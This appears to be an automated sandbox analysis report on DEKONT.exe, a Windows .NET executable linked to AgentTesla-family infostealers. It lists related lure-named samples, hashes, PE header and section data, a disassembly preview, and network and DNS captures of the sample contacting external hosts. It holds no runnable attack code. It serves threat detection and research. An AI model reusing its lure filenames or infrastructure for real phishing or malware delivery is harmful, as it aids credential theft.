	https://u44056869.ct.sendgrid.net/ls/click?upn=u001.nH1ryR-2Btr2av-2Bkfc8quLEXKlGRKFonctFf3nB-2FAP-2Bjae3IsQgCoKtK-2FQ57cEEmmhZzRyd07G16kQ6rsc4EaJT6S7Rh48kOVsBPHV-2Fkkk9Vfz7cojLOCLuj4sUGVMM7pbdmwtinmtiLhfYkhEkgve628OiJsccHyeYc3lkmkn6epsOmmj4-2Fi-2BWjxfm73m7vUzCOGnDWnQJBmmd6DmkDcfIw-3D-3DU_vL_MRfqZW9nS4IDBSHT8MfJfSAq9b0aOVvtJoUhpW1Ga8ePAnfV-2FfXwE0xIGnayeXag21qNKRc5VLcgMkPlIuCBf7Hi8EFUvj1-2FlklJpMLZNx1IQq8eO26tVdmeuxhGn-2B2zjA71oEkiC9pTrxX9Dz-2FMJk8mkJr62ye1KlBo-2B8fxBlVl-2B6T0POpB0GKoibGhcjh4Z-2FnPU453nMAkUkNy65MlaA-3D-3D	Get hash	malicious	HTMLPhisher	Browse	104.21.27.85
	F#U0130YAT TEKL#U0130F.exe	Get hash	malicious	AgentTesla, PureLog Stealer, RedLine	Browse	104.21.27.85
	New DHL Shipment Document Arrival Notice.pdf.exe	Get hash	malicious	AgentTesla	Browse	104.21.27.85
	hesaphareketi_1.scr.exe	Get hash	malicious	AgentTesla	Browse	104.21.27.85
	e-dekont.exe	Get hash	malicious	AgentTesla	Browse	104.21.27.85
	e-dekont.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.27.85

Process:	C:\Users\user\Desktop\DEKONT.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1216
Entropy (8bit):	5.34331486778365
Encrypted:	false
SSDEEP:	24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
MD5:	1330C80CAAC9A0FB172F202485E9B1E8
SHA1:	86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
SHA-256:	B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
SHA-512:	75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
Malicious:	false
Reputation:	high, very likely benign file
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.363765319780092
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.83% Win32 Executable (generic) a (10002005/4) 49.78% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Win16/32 Executable Delphi generic (2074/23) 0.01% Generic Win/DOS Executable (2004/3) 0.01%
File name:	DEKONT.exe
File size:	971'776 bytes
MD5:	384c4da2b75f4c7a1fa5585bc07634e6
SHA1:	27d368536af080b92d543f9c24af8596cc0edd6d
SHA256:	8980e6e2628b4103f4e3e0b01365a5e9a7df6e38c067c93633371c94b3d5dd34
SHA512:	6b7919c2cb1a0900dad45b9d0a44aa7b7ff20a24cad142704978f3737f16ee5df0c3b9d2b1c5de05a0e565a9dfe591a82e7706eeda98c818d7a2840050f160b1
SSDEEP:	12288:mF2iNryhiHr2JXAfykubkHwObkzi4pYv0lv312Z3:mF1lyhiHrAXAaXbkHwZ1qMJ312Z
TLSH:	CF256DD1F1508D97E86F06F2AD2A643025E3BE9D54A4C10C5A99BB5B36F3342209FE1F
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....................0..D...........b... ........@.. .......................@............@................................

File Icon


Icon Hash:	aea4accc16a3d9be

Static PE Info

General

Entrypoint:	0x4a62a2
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x8DFED4A7 [Wed Jun 28 18:40:39 2045 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
inc esi
dec edi
push edx
xor al, 54h
xor eax, 42384738h
aaa
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [edi], dh
cmp byte ptr [ecx+50h], dl
xor eax, 36374734h
pop edx
inc ebx
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xa624d	0x4f	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xa8000	0x48aac	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xf2000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0xa251c	0x70	.text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0xa42c8	0xa4400	04552619d31f43dd928e2ad108f5213a	False	0.9118225004756468	data	7.894619562911896	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0xa8000	0x48aac	0x48c00	51557ee744ca5e22f51770688b12c303	False	0.0632215152491409	data	4.771204243342389	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0xf2000	0xc	0x200	630295826c3b58f2e49b6824a3673c7c	False	0.044921875	data	0.10191042566270775	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	ZLIB Complexity
RT_ICON	0xa82e0	0x668	Device independent bitmap graphic, 48 x 96 x 4, image size 0	0.1798780487804878
RT_ICON	0xa8948	0x2e8	Device independent bitmap graphic, 32 x 64 x 4, image size 0	0.2513440860215054
RT_ICON	0xa8c30	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 0	0.3918918918918919
RT_ICON	0xa8d58	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0	0.3200959488272921
RT_ICON	0xa9c00	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0	0.33664259927797835
RT_ICON	0xaa4a8	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0	0.2622832369942196
RT_ICON	0xaaa10	0x42028	Device independent bitmap graphic, 256 x 512 x 32, image size 0	0.04393141403083114
RT_ICON	0xeca38	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	0.18786307053941909
RT_ICON	0xeefe0	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	0.2453095684803002
RT_ICON	0xf0088	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	0.3484042553191489
RT_GROUP_ICON	0xf04f0	0x92	data	0.5753424657534246
RT_VERSION	0xf0584	0x33c	data	0.427536231884058
RT_MANIFEST	0xf08c0	0x1ea	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators	0.5489795918367347

Imports

DLL	Import
mscoree.dll	_CorExeMain

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Apr 24, 2024 10:12:03.319567919 CEST	49707	80	192.168.2.8	193.122.6.168
Apr 24, 2024 10:12:03.623764992 CEST	80	49707	193.122.6.168	192.168.2.8
Apr 24, 2024 10:12:03.624131918 CEST	49707	80	192.168.2.8	193.122.6.168
Apr 24, 2024 10:12:03.624500990 CEST	49707	80	192.168.2.8	193.122.6.168
Apr 24, 2024 10:12:03.933546066 CEST	80	49707	193.122.6.168	192.168.2.8
Apr 24, 2024 10:12:04.560245991 CEST	80	49707	193.122.6.168	192.168.2.8
Apr 24, 2024 10:12:04.571971893 CEST	49707	80	192.168.2.8	193.122.6.168
Apr 24, 2024 10:12:04.875252008 CEST	80	49707	193.122.6.168	192.168.2.8
Apr 24, 2024 10:12:04.876972914 CEST	80	49707	193.122.6.168	192.168.2.8
Apr 24, 2024 10:12:04.917926073 CEST	49707	80	192.168.2.8	193.122.6.168
Apr 24, 2024 10:12:05.177871943 CEST	49709	443	192.168.2.8	104.21.67.152
Apr 24, 2024 10:12:05.177906990 CEST	443	49709	104.21.67.152	192.168.2.8
Apr 24, 2024 10:12:05.177973032 CEST	49709	443	192.168.2.8	104.21.67.152
Apr 24, 2024 10:12:05.187628031 CEST	49709	443	192.168.2.8	104.21.67.152
Apr 24, 2024 10:12:05.187648058 CEST	443	49709	104.21.67.152	192.168.2.8
Apr 24, 2024 10:12:05.536119938 CEST	443	49709	104.21.67.152	192.168.2.8
Apr 24, 2024 10:12:05.536227942 CEST	49709	443	192.168.2.8	104.21.67.152
Apr 24, 2024 10:12:05.543389082 CEST	49709	443	192.168.2.8	104.21.67.152
Apr 24, 2024 10:12:05.543401957 CEST	443	49709	104.21.67.152	192.168.2.8
Apr 24, 2024 10:12:05.543863058 CEST	443	49709	104.21.67.152	192.168.2.8
Apr 24, 2024 10:12:05.589725971 CEST	49709	443	192.168.2.8	104.21.67.152
Apr 24, 2024 10:12:05.595406055 CEST	49709	443	192.168.2.8	104.21.67.152
Apr 24, 2024 10:12:05.640111923 CEST	443	49709	104.21.67.152	192.168.2.8
Apr 24, 2024 10:12:05.896486044 CEST	443	49709	104.21.67.152	192.168.2.8
Apr 24, 2024 10:12:05.896625996 CEST	443	49709	104.21.67.152	192.168.2.8
Apr 24, 2024 10:12:05.896783113 CEST	49709	443	192.168.2.8	104.21.67.152
Apr 24, 2024 10:12:05.903105974 CEST	49709	443	192.168.2.8	104.21.67.152
Apr 24, 2024 10:12:05.906738997 CEST	49707	80	192.168.2.8	193.122.6.168
Apr 24, 2024 10:12:06.250719070 CEST	80	49707	193.122.6.168	192.168.2.8
Apr 24, 2024 10:12:06.254301071 CEST	49710	443	192.168.2.8	104.21.67.152
Apr 24, 2024 10:12:06.254358053 CEST	443	49710	104.21.67.152	192.168.2.8
Apr 24, 2024 10:12:06.254424095 CEST	49710	443	192.168.2.8	104.21.67.152
Apr 24, 2024 10:12:06.254683018 CEST	49710	443	192.168.2.8	104.21.67.152
Apr 24, 2024 10:12:06.254699945 CEST	443	49710	104.21.67.152	192.168.2.8
Apr 24, 2024 10:12:06.292835951 CEST	49707	80	192.168.2.8	193.122.6.168
Apr 24, 2024 10:12:06.588880062 CEST	443	49710	104.21.67.152	192.168.2.8
Apr 24, 2024 10:12:06.591666937 CEST	49710	443	192.168.2.8	104.21.67.152
Apr 24, 2024 10:12:06.591711998 CEST	443	49710	104.21.67.152	192.168.2.8
Apr 24, 2024 10:12:06.968854904 CEST	443	49710	104.21.67.152	192.168.2.8
Apr 24, 2024 10:12:06.969105005 CEST	443	49710	104.21.67.152	192.168.2.8
Apr 24, 2024 10:12:06.969166040 CEST	49710	443	192.168.2.8	104.21.67.152
Apr 24, 2024 10:12:06.969562054 CEST	49710	443	192.168.2.8	104.21.67.152
Apr 24, 2024 10:12:06.974662066 CEST	49707	80	192.168.2.8	193.122.6.168
Apr 24, 2024 10:12:06.976347923 CEST	49712	80	192.168.2.8	193.122.6.168
Apr 24, 2024 10:12:07.280805111 CEST	80	49707	193.122.6.168	192.168.2.8
Apr 24, 2024 10:12:07.280875921 CEST	49707	80	192.168.2.8	193.122.6.168
Apr 24, 2024 10:12:07.288424015 CEST	80	49712	193.122.6.168	192.168.2.8
Apr 24, 2024 10:12:07.288525105 CEST	49712	80	192.168.2.8	193.122.6.168
Apr 24, 2024 10:12:07.288696051 CEST	49712	80	192.168.2.8	193.122.6.168
Apr 24, 2024 10:12:07.596345901 CEST	80	49712	193.122.6.168	192.168.2.8
Apr 24, 2024 10:12:07.803047895 CEST	80	49712	193.122.6.168	192.168.2.8
Apr 24, 2024 10:12:07.804737091 CEST	49714	443	192.168.2.8	104.21.67.152
Apr 24, 2024 10:12:07.804776907 CEST	443	49714	104.21.67.152	192.168.2.8
Apr 24, 2024 10:12:07.804905891 CEST	49714	443	192.168.2.8	104.21.67.152
Apr 24, 2024 10:12:07.805218935 CEST	49714	443	192.168.2.8	104.21.67.152
Apr 24, 2024 10:12:07.805237055 CEST	443	49714	104.21.67.152	192.168.2.8
Apr 24, 2024 10:12:07.855355024 CEST	49712	80	192.168.2.8	193.122.6.168
Apr 24, 2024 10:12:08.142251015 CEST	443	49714	104.21.67.152	192.168.2.8
Apr 24, 2024 10:12:08.145404100 CEST	49714	443	192.168.2.8	104.21.67.152
Apr 24, 2024 10:12:08.145445108 CEST	443	49714	104.21.67.152	192.168.2.8
Apr 24, 2024 10:12:08.513799906 CEST	443	49714	104.21.67.152	192.168.2.8
Apr 24, 2024 10:12:08.514070034 CEST	443	49714	104.21.67.152	192.168.2.8
Apr 24, 2024 10:12:08.514570951 CEST	49714	443	192.168.2.8	104.21.67.152
Apr 24, 2024 10:12:08.515059948 CEST	49714	443	192.168.2.8	104.21.67.152
Apr 24, 2024 10:12:08.518625975 CEST	49712	80	192.168.2.8	193.122.6.168
Apr 24, 2024 10:12:08.519779921 CEST	49715	80	192.168.2.8	193.122.6.168
Apr 24, 2024 10:12:08.823577881 CEST	80	49715	193.122.6.168	192.168.2.8
Apr 24, 2024 10:12:08.823668957 CEST	49715	80	192.168.2.8	193.122.6.168
Apr 24, 2024 10:12:08.823833942 CEST	49715	80	192.168.2.8	193.122.6.168
Apr 24, 2024 10:12:08.839463949 CEST	80	49712	193.122.6.168	192.168.2.8
Apr 24, 2024 10:12:08.839543104 CEST	49712	80	192.168.2.8	193.122.6.168
Apr 24, 2024 10:12:09.128787994 CEST	80	49715	193.122.6.168	192.168.2.8
Apr 24, 2024 10:12:09.919146061 CEST	80	49715	193.122.6.168	192.168.2.8
Apr 24, 2024 10:12:09.920820951 CEST	49716	443	192.168.2.8	104.21.67.152
Apr 24, 2024 10:12:09.920908928 CEST	443	49716	104.21.67.152	192.168.2.8
Apr 24, 2024 10:12:09.920999050 CEST	49716	443	192.168.2.8	104.21.67.152
Apr 24, 2024 10:12:09.921358109 CEST	49716	443	192.168.2.8	104.21.67.152
Apr 24, 2024 10:12:09.921392918 CEST	443	49716	104.21.67.152	192.168.2.8
Apr 24, 2024 10:12:09.964812040 CEST	49715	80	192.168.2.8	193.122.6.168
Apr 24, 2024 10:12:10.252162933 CEST	443	49716	104.21.67.152	192.168.2.8
Apr 24, 2024 10:12:10.253998041 CEST	49716	443	192.168.2.8	104.21.67.152
Apr 24, 2024 10:12:10.254075050 CEST	443	49716	104.21.67.152	192.168.2.8
Apr 24, 2024 10:12:10.628529072 CEST	443	49716	104.21.67.152	192.168.2.8
Apr 24, 2024 10:12:10.628621101 CEST	443	49716	104.21.67.152	192.168.2.8
Apr 24, 2024 10:12:10.628698111 CEST	49716	443	192.168.2.8	104.21.67.152
Apr 24, 2024 10:12:10.629390955 CEST	49716	443	192.168.2.8	104.21.67.152
Apr 24, 2024 10:12:10.633388042 CEST	49715	80	192.168.2.8	193.122.6.168
Apr 24, 2024 10:12:10.634345055 CEST	49717	80	192.168.2.8	193.122.6.168
Apr 24, 2024 10:12:10.936949968 CEST	80	49715	193.122.6.168	192.168.2.8
Apr 24, 2024 10:12:10.937148094 CEST	49715	80	192.168.2.8	193.122.6.168
Apr 24, 2024 10:12:10.942636967 CEST	80	49717	193.122.6.168	192.168.2.8
Apr 24, 2024 10:12:10.942722082 CEST	49717	80	192.168.2.8	193.122.6.168
Apr 24, 2024 10:12:10.942965984 CEST	49717	80	192.168.2.8	193.122.6.168
Apr 24, 2024 10:12:11.250283957 CEST	80	49717	193.122.6.168	192.168.2.8
Apr 24, 2024 10:12:11.251729012 CEST	80	49717	193.122.6.168	192.168.2.8
Apr 24, 2024 10:12:11.253257036 CEST	49718	443	192.168.2.8	104.21.67.152
Apr 24, 2024 10:12:11.253292084 CEST	443	49718	104.21.67.152	192.168.2.8
Apr 24, 2024 10:12:11.253356934 CEST	49718	443	192.168.2.8	104.21.67.152
Apr 24, 2024 10:12:11.253659964 CEST	49718	443	192.168.2.8	104.21.67.152
Apr 24, 2024 10:12:11.253673077 CEST	443	49718	104.21.67.152	192.168.2.8
Apr 24, 2024 10:12:11.292905092 CEST	49717	80	192.168.2.8	193.122.6.168
Apr 24, 2024 10:12:11.580502987 CEST	443	49718	104.21.67.152	192.168.2.8
Apr 24, 2024 10:12:11.589420080 CEST	49718	443	192.168.2.8	104.21.67.152
Apr 24, 2024 10:12:11.589452982 CEST	443	49718	104.21.67.152	192.168.2.8
Apr 24, 2024 10:12:11.955933094 CEST	443	49718	104.21.67.152	192.168.2.8
Apr 24, 2024 10:12:11.956047058 CEST	443	49718	104.21.67.152	192.168.2.8
Apr 24, 2024 10:12:11.956365108 CEST	49718	443	192.168.2.8	104.21.67.152
Apr 24, 2024 10:12:11.956937075 CEST	49718	443	192.168.2.8	104.21.67.152
Apr 24, 2024 10:12:11.960973024 CEST	49717	80	192.168.2.8	193.122.6.168
Apr 24, 2024 10:12:11.962287903 CEST	49719	80	192.168.2.8	193.122.6.168
Apr 24, 2024 10:12:12.268515110 CEST	80	49717	193.122.6.168	192.168.2.8
Apr 24, 2024 10:12:12.268644094 CEST	49717	80	192.168.2.8	193.122.6.168
Apr 24, 2024 10:12:12.269782066 CEST	80	49719	193.122.6.168	192.168.2.8
Apr 24, 2024 10:12:12.269893885 CEST	49719	80	192.168.2.8	193.122.6.168
Apr 24, 2024 10:12:12.270056009 CEST	49719	80	192.168.2.8	193.122.6.168
Apr 24, 2024 10:12:12.578660965 CEST	80	49719	193.122.6.168	192.168.2.8
Apr 24, 2024 10:12:12.676800966 CEST	80	49719	193.122.6.168	192.168.2.8
Apr 24, 2024 10:12:12.678572893 CEST	49720	443	192.168.2.8	104.21.67.152
Apr 24, 2024 10:12:12.678621054 CEST	443	49720	104.21.67.152	192.168.2.8
Apr 24, 2024 10:12:12.678711891 CEST	49720	443	192.168.2.8	104.21.67.152
Apr 24, 2024 10:12:12.679054976 CEST	49720	443	192.168.2.8	104.21.67.152
Apr 24, 2024 10:12:12.679078102 CEST	443	49720	104.21.67.152	192.168.2.8
Apr 24, 2024 10:12:12.730340958 CEST	49719	80	192.168.2.8	193.122.6.168
Apr 24, 2024 10:12:13.009645939 CEST	443	49720	104.21.67.152	192.168.2.8
Apr 24, 2024 10:12:13.011406898 CEST	49720	443	192.168.2.8	104.21.67.152
Apr 24, 2024 10:12:13.011436939 CEST	443	49720	104.21.67.152	192.168.2.8
Apr 24, 2024 10:12:13.384921074 CEST	443	49720	104.21.67.152	192.168.2.8
Apr 24, 2024 10:12:13.385071993 CEST	443	49720	104.21.67.152	192.168.2.8
Apr 24, 2024 10:12:13.385169029 CEST	49720	443	192.168.2.8	104.21.67.152
Apr 24, 2024 10:12:13.385884047 CEST	49720	443	192.168.2.8	104.21.67.152
Apr 24, 2024 10:12:13.390002966 CEST	49719	80	192.168.2.8	193.122.6.168
Apr 24, 2024 10:12:13.391237974 CEST	49721	80	192.168.2.8	193.122.6.168
Apr 24, 2024 10:12:13.695853949 CEST	80	49721	193.122.6.168	192.168.2.8
Apr 24, 2024 10:12:13.695960999 CEST	49721	80	192.168.2.8	193.122.6.168
Apr 24, 2024 10:12:13.696244001 CEST	49721	80	192.168.2.8	193.122.6.168
Apr 24, 2024 10:12:13.719337940 CEST	80	49719	193.122.6.168	192.168.2.8
Apr 24, 2024 10:12:13.719407082 CEST	49719	80	192.168.2.8	193.122.6.168
Apr 24, 2024 10:12:13.999903917 CEST	80	49721	193.122.6.168	192.168.2.8
Apr 24, 2024 10:12:14.082504034 CEST	80	49721	193.122.6.168	192.168.2.8
Apr 24, 2024 10:12:14.084181070 CEST	49722	443	192.168.2.8	104.21.67.152
Apr 24, 2024 10:12:14.084222078 CEST	443	49722	104.21.67.152	192.168.2.8
Apr 24, 2024 10:12:14.084319115 CEST	49722	443	192.168.2.8	104.21.67.152
Apr 24, 2024 10:12:14.084602118 CEST	49722	443	192.168.2.8	104.21.67.152
Apr 24, 2024 10:12:14.084616899 CEST	443	49722	104.21.67.152	192.168.2.8
Apr 24, 2024 10:12:14.136605024 CEST	49721	80	192.168.2.8	193.122.6.168
Apr 24, 2024 10:12:14.413245916 CEST	443	49722	104.21.67.152	192.168.2.8
Apr 24, 2024 10:12:14.415039062 CEST	49722	443	192.168.2.8	104.21.67.152
Apr 24, 2024 10:12:14.415060043 CEST	443	49722	104.21.67.152	192.168.2.8
Apr 24, 2024 10:12:14.788444042 CEST	443	49722	104.21.67.152	192.168.2.8
Apr 24, 2024 10:12:14.789522886 CEST	443	49722	104.21.67.152	192.168.2.8
Apr 24, 2024 10:12:14.789587021 CEST	49722	443	192.168.2.8	104.21.67.152
Apr 24, 2024 10:12:14.790112019 CEST	49722	443	192.168.2.8	104.21.67.152
Apr 24, 2024 10:12:14.795697927 CEST	49721	80	192.168.2.8	193.122.6.168
Apr 24, 2024 10:12:14.796803951 CEST	49723	80	192.168.2.8	193.122.6.168
Apr 24, 2024 10:12:15.101866007 CEST	80	49721	193.122.6.168	192.168.2.8
Apr 24, 2024 10:12:15.102413893 CEST	49721	80	192.168.2.8	193.122.6.168
Apr 24, 2024 10:12:15.102910995 CEST	80	49723	193.122.6.168	192.168.2.8
Apr 24, 2024 10:12:15.103001118 CEST	49723	80	192.168.2.8	193.122.6.168
Apr 24, 2024 10:12:15.103277922 CEST	49723	80	192.168.2.8	193.122.6.168
Apr 24, 2024 10:12:15.408463001 CEST	80	49723	193.122.6.168	192.168.2.8
Apr 24, 2024 10:12:15.409518957 CEST	80	49723	193.122.6.168	192.168.2.8
Apr 24, 2024 10:12:15.411128998 CEST	49724	443	192.168.2.8	104.21.67.152
Apr 24, 2024 10:12:15.411175013 CEST	443	49724	104.21.67.152	192.168.2.8
Apr 24, 2024 10:12:15.411235094 CEST	49724	443	192.168.2.8	104.21.67.152
Apr 24, 2024 10:12:15.411632061 CEST	49724	443	192.168.2.8	104.21.67.152
Apr 24, 2024 10:12:15.411653996 CEST	443	49724	104.21.67.152	192.168.2.8
Apr 24, 2024 10:12:15.464826107 CEST	49723	80	192.168.2.8	193.122.6.168
Apr 24, 2024 10:12:15.748035908 CEST	443	49724	104.21.67.152	192.168.2.8
Apr 24, 2024 10:12:15.749857903 CEST	49724	443	192.168.2.8	104.21.67.152
Apr 24, 2024 10:12:15.749939919 CEST	443	49724	104.21.67.152	192.168.2.8
Apr 24, 2024 10:12:16.120410919 CEST	443	49724	104.21.67.152	192.168.2.8
Apr 24, 2024 10:12:16.120564938 CEST	443	49724	104.21.67.152	192.168.2.8
Apr 24, 2024 10:12:16.120630980 CEST	49724	443	192.168.2.8	104.21.67.152
Apr 24, 2024 10:12:16.127154112 CEST	49724	443	192.168.2.8	104.21.67.152
Apr 24, 2024 10:12:16.139414072 CEST	49723	80	192.168.2.8	193.122.6.168
Apr 24, 2024 10:12:16.448553085 CEST	80	49723	193.122.6.168	192.168.2.8
Apr 24, 2024 10:12:16.448714972 CEST	49723	80	192.168.2.8	193.122.6.168
Apr 24, 2024 10:12:17.830497980 CEST	49725	443	192.168.2.8	104.21.27.85
Apr 24, 2024 10:12:17.830545902 CEST	443	49725	104.21.27.85	192.168.2.8
Apr 24, 2024 10:12:17.830607891 CEST	49725	443	192.168.2.8	104.21.27.85
Apr 24, 2024 10:12:17.831974983 CEST	49725	443	192.168.2.8	104.21.27.85
Apr 24, 2024 10:12:17.831995964 CEST	443	49725	104.21.27.85	192.168.2.8
Apr 24, 2024 10:12:18.164330006 CEST	443	49725	104.21.27.85	192.168.2.8
Apr 24, 2024 10:12:18.164452076 CEST	49725	443	192.168.2.8	104.21.27.85
Apr 24, 2024 10:12:18.166623116 CEST	49725	443	192.168.2.8	104.21.27.85
Apr 24, 2024 10:12:18.166645050 CEST	443	49725	104.21.27.85	192.168.2.8
Apr 24, 2024 10:12:18.166943073 CEST	443	49725	104.21.27.85	192.168.2.8
Apr 24, 2024 10:12:18.168804884 CEST	49725	443	192.168.2.8	104.21.27.85
Apr 24, 2024 10:12:18.216120958 CEST	443	49725	104.21.27.85	192.168.2.8
Apr 24, 2024 10:12:53.448645115 CEST	443	49725	104.21.27.85	192.168.2.8
Apr 24, 2024 10:12:53.448808908 CEST	443	49725	104.21.27.85	192.168.2.8
Apr 24, 2024 10:12:53.448911905 CEST	49725	443	192.168.2.8	104.21.27.85
Apr 24, 2024 10:12:53.458935022 CEST	49725	443	192.168.2.8	104.21.27.85

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Apr 24, 2024 10:12:03.158843040 CEST	49454	53	192.168.2.8	1.1.1.1
Apr 24, 2024 10:12:03.312304974 CEST	53	49454	1.1.1.1	192.168.2.8
Apr 24, 2024 10:12:04.925591946 CEST	55193	53	192.168.2.8	1.1.1.1
Apr 24, 2024 10:12:05.176920891 CEST	53	55193	1.1.1.1	192.168.2.8
Apr 24, 2024 10:12:16.139307976 CEST	58336	53	192.168.2.8	1.1.1.1
Apr 24, 2024 10:12:17.604257107 CEST	58336	53	192.168.2.8	1.1.1.1
Apr 24, 2024 10:12:17.819188118 CEST	53	58336	1.1.1.1	192.168.2.8
Apr 24, 2024 10:12:17.819236994 CEST	53	58336	1.1.1.1	192.168.2.8

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Apr 24, 2024 10:12:03.158843040 CEST	192.168.2.8	1.1.1.1	0x32bc	Standard query (0)	checkip.dyndns.org	A (IP address)	IN (0x0001)	false
